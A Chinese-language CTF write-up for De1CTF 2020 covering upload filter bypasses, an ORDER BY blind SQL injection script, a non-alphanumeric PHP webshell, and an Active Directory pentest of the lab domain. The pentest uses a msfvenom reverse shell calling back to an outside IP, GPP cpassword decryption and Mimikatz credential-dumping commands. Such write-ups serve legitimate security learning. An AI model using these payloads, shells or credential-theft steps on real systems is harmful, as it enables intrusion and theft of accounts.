De1CTF2020 wp

又是一次自闭的比赛。。。队友们tql

checkin

.php之类的文件名不能上传,内容过滤了:

perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!

.htaccess:

AddType application/x-httpd-p\
hp .xxx

a.xxx:

<?=`cat /flag`;

不过最开始扫目录发现有个/cgi-bin/目录,查看phpinfo也是开启了cgi的;

搜索到有相关的利用姿势:

https://www.cnblogs.com/linuxsec/articles/11872187.html

不过一用就500。。

mixture

orderby盲注,脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests 
import time

url = 'http://134.175.185.244/member.php?orderby='
flag = ''
for i in range(50):
for j in range(33, 128):
print(j)
#payload = 'and(ELT(ord(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),{},1))={},benchmark(200000,sha(1))))'.format(i, j)
payload = "and(ELT(ord(mid((select password from member where username='admin'),{},1))={},benchmark(200000,sha(1))))".format(i, j)

try:
#time.sleep(1)
res = requests.get(url+payload, timeout=6).text
except:
flag += chr(j)
print(flag)
break

MD5解密得到密码

goodlucktoyou

之后可以查看phpinfo和读文件,member.php关键代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php

$orderby = $_GET['orderby'];
if(!empty($orderby)){
$blacklist = "/if|desc|sleep|rand|updatexml|\^|union|\|\||&&|regexp|exp|extractvalue|length|hex/i";
if(preg_match($blacklist, $orderby))
exit("No~~hacker!");
$sql = "SELECT * FROM users order by id ".$orderby;
$result = $mysqli->query($sql);
if($result===false){
$sql="SELECT * FROM users";
}
}
else{
$sql = "SELECT * FROM users";
}
$result = $mysqli->query($sql);

select.php关键代码:

1
2
3
4
5
if($_SESSION['admin']==1&&!empty($search)){
//var_dump(urldecode($search));
Minclude(urldecode($search));
//lookup($search);
}

读取配置文件:

/usr/local/etc/php/php.ini 

最后一行得到:

extension=/usr/local/lib/php/extensions/no-debug-non-zts-20170718/Minclude.so

然后。。。PWN!

Hard_Pentest_1

文件上传,关键过滤代码:

1
2
3
4
5
if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  &&  
!in_array($exts, $BlackExts) &&
!preg_match('/\.\./',$_FILES["file"]["name"])) {
return true;
}

题目是在windows环境+php7.2,文件后缀可用大写绕过,内容不能出现分号,可用短标签,参考p神文章:

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

构造:

$_POST[_]($_POST[__])

即:

<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$__=$_?><?=$_++?><?=$___=$_?><?=$_++?><?=$_++?><?=$_++?><?=$____=$_?><?=$_++?><?=$_____=$_?><?=$_=${'_'.$___.$__.$____.$_____}[_]?><?=$_(${'_'.$___.$__.$____.$_____}[__])?>

然后写一句话方便蚁剑连接:

_=system&__=echo "<?php eval($_POST[1])?>" > ggg.php

flag不在web服务器上,进行渗透

查看ip等信息,ipconfig

IPv4 Address. . . . . . . . . . . : 192.168.0.11

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.0.253

查看系统等信息,systeminfo

OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
Domain:                    De1CTF2020.lab
Logon Server:              N/A

net time /domain:

Current time at \\dc.De1CTF2020.lab is 5/2/2020 8:26:14 PM

说明存在域,并且当前用户是域用户

上传nbtscan扫描内网:

nbtscan-1.0.35.exe 192.168.0.0/24

192.168.0.11    DE1CTF2020\DM                   SHARING
192.168.0.12    DE1CTF2020\DC                   SHARING

说明192.168.0.12是域控

查询所有域用户列表:

C:\web\uploads\eafe07250c2680e6a1c3547649b426b6>net user /domain
net user /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.

User accounts for \\dc.De1CTF2020.lab

-------------------------------------------------------------------------------
Administrator            De1ta                    Guest                    
HintZip_Pass             krbtgt                   web                      
The command completed successfully.

这里由于蚁剑的shell有的地方使用有问题,便使用MSF生成并反弹shell,首先生成shell文件:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=62.234.60.226 LPORT=12345  -f  exe  -o shell.exe

将生成的shell.exe上传到目标机器上g.exe,然后启动msf,

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 12345
exploit

然后在目标机器执行g.exe,获得shell

查看Server username:

meterpreter > getuid

使用目标机器cmd(exit返回):

meterpreter > shell

查看IPC链接:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>net use
net use
New connections will be remembered.

Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK                     \\192.168.0.12\IPC$       Microsoft Windows Network
The command completed successfully.

查看域控开启了哪些共享:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>net view \\dc.De1CTF2020.lab
net view \\dc.De1CTF2020.lab
Shared resources at \\dc.De1CTF2020.lab

Share name  Type  Used as  Comment              

-------------------------------------------------------------------------------
Hint        Disk                                
NETLOGON    Disk           Logon server share   
SYSVOL      Disk           Logon server share   
The command completed successfully.

改变工作路径为域控共享文件中的Hint(改变回来输入popd):

pushd \\dc.De1CTF2020.lab\Hint

查看文件:

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 30B1-A1C0

 Directory of Z:\

04/17/2020  11:26 AM    <DIR>          .
04/17/2020  11:26 AM    <DIR>          ..
04/17/2020  11:26 AM               528 flag1_and_flag2hint.zip
               1 File(s)            528 bytes
               2 Dir(s)  29,204,348,928 bytes free

将这个zip文件copy到web服务器上:

Z:\>copy fl* C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde\aaa.zip

切换回meterpreter,将文件下载到本地(上传可用upload):

meterpreter > download C:\\web\\uploads\\5fb7ef1b5925b3f12f0c2a5c8739bcde\\aaa.zip

接下来攻击GPP:

组策略首选项(Group Policy Preference, GPP)借助组策略对象(Group Policy Object, GPO)实现了对域中所有资源的管理。这大大简化了系统管理工作。然而GPP有一个特殊的功能,它可以指定某个计算机的某个域账户为域中所有的本地计算机管理账户。为什么有些人会使用这个功能呢?原因或许是他们就是想在所有计算机上指定某个新管理员,或许他们就是想在每台主机上更新本地账户的密码。一旦管理员使用了这个机制更新了GPO,那么所有的工作站将会拥有这个账户。在GPP的域环境下,这个账户的信息存储在域里,而且所有的AD用户都可以读取它。 通过GPP发布的账户信息全部存储在[Domain Controller]\SYSVOL[Domain]\Policies中。其中的Groups.xml文件中就有cpassword的哈希值

相关文章:

https://www.freebuf.com/vuls/92016.html
https://www.anquanke.com/post/id/92646

搜索

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>dir /s /a \\192.168.0.12\SYSVOL\*.xml
dir /s /a \\192.168.0.12\SYSVOL\*.xml
 Volume in drive \\192.168.0.12\SYSVOL has no label.
 Volume Serial Number is 30B1-A1C0

 Directory of \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups

04/15/2020  10:43 PM               478 Groups.xml
               1 File(s)            478 bytes

     Total Files Listed:
               1 File(s)            478 bytes
               0 Dir(s)  29,202,460,672 bytes free

查看其内容:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>

Cpassword变量采取了AES的加密算法,微软已经公开了它的对称AES密钥。在加密密钥已知的情况下,我们就可以破解GPP中本地管理员账户的密码

解密GPP:

https://github.com/lucasko/gpp-encrypt-decrypt/edit/master/Gpprefdecrypt.py

得到压缩包内容:

flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.

其实msf有GPP相关的内置模块,可直接一把梭:

use post/windows/gather/credentials/gpp

background让当前会话保存到后台)


其他操作命令:

1.查看所有会话:

sessions

使用会话1:

sessions -i 1

2.使用mimikatz:

load mimikatz

获取hash值:

msv

获取明文信息:

ssp

读取内存中存放的账号密码明文信息:

wdigest
tspkg

运行自定义命令:

mimikatz_command -f xxx

Hard_Pentest_2

使用msf内置的Windows-Exploit-suggester:

use post/multi/recon/local_exploit_suggester
set seesion 1
exploit

列出的exp都不能用

W&M的writeup(tql):

https://mp.weixin.qq.com/s?__biz=MzIxMDYyNTk3Nw==&mid=2247484747&idx=1&sn=2de314ca00d03e015d77a012b9e53757&chksm=9760f19da017788b250fd1b82d47c439c0d63a50d3f8a682187d4d363100e0c2f8489881c228&mpshare=1&scene=23&srcid=&sharer_sharetime=1588730074125&sharer_shareid=4a10c7a3217b7d523bf5792d7f0ca071#rd

算了对这方面还是了解太少,等以后往这方面学学在回来看看吧555

相关域渗透的文章:

https://3gstudent.github.io/3gstudent.github.io/Windows%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7Juicy-Potato%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/

https://wh0ale.github.io/2018/12/25/2018-12-25-%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E7%A5%A8%E6%8D%AE/

https://www.cnblogs.com/artech/archive/2007/07/05/807492.html

https://www.anquanke.com/post/id/92646